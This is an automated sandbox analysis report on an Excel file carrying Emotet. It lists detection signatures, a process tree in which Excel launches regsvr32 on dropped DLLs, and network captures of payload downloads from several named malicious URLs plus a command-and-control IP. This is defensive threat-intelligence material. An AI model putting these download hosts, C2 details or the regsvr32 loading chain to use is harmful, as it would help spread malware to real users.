Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Datei_26744565.xls

Overview

General Information

Sample Name:Datei_26744565.xls
Analysis ID:632101
MD5:a8777e5596125dadbb7563052324e1bb
SHA1:bbd66379044f8d49541a7ae6d793b44a0aea3b49
SHA256:cbd5b0454385324baee6fc97124c8656ea55f4272f7365e2fbcf570470cba4e6
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2180 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2420 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2408 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3020 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2412 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2944 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1740 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2680 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.regsvr32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.regsvr32.exe.3c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.regsvr32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.1fe0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.regsvr32.exe.2e0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 11 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Datei_26744565.xlsReversingLabs: Detection: 39%
                      Antivirus detection for URL or domain
                      Source: http://learnviaonline.com/wp-admin/qGb/Avira URL Cloud: Label: malware
                      Source: http://milanstaffing.com/images/D4TRnDubF/Avira URL Cloud: Label: malware
                      Source: http://kolejleri.com/wp-admin/REvup/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: kolejleri.comVirustotal: Detection: 11%Perma Link
                      Source: milanstaffing.comVirustotal: Detection: 6%Perma Link
                      Source: learnviaonline.comVirustotal: Detection: 8%Perma Link
                      Source: stainedglassexpress.comVirustotal: Detection: 5%Perma Link
                      Source: http://learnviaonline.com/wp-admin/qGb/Virustotal: Detection: 14%Perma Link
                      Source: http://milanstaffing.com/images/D4TRnDubF/Virustotal: Detection: 13%Perma Link
                      Source: http://kolejleri.com/wp-admin/REvup/Virustotal: Detection: 18%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr1.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr2.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr3.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr4.ocxMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\uxevr4.ocxReversingLabs: Detection: 60%
                      Source: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)Metadefender: Detection: 28%Perma Link
                      Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)ReversingLabs: Detection: 60%
                      Source: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)ReversingLabs: Detection: 58%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr4.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Jf8[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: learnviaonline.com
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: Joe Sandbox ViewASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
                      Source: Joe Sandbox ViewIP Address: 103.171.181.223 103.171.181.223
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:03 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:03 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:10 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:10 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikk
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:50:16 GMTexpires: Mon, 23 May 2022 07:50:16 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:50:16 GMTserver: LiteSpeedvary: User-AgentData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$
                      Source: global trafficHTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.73.229:8080
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.com
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/
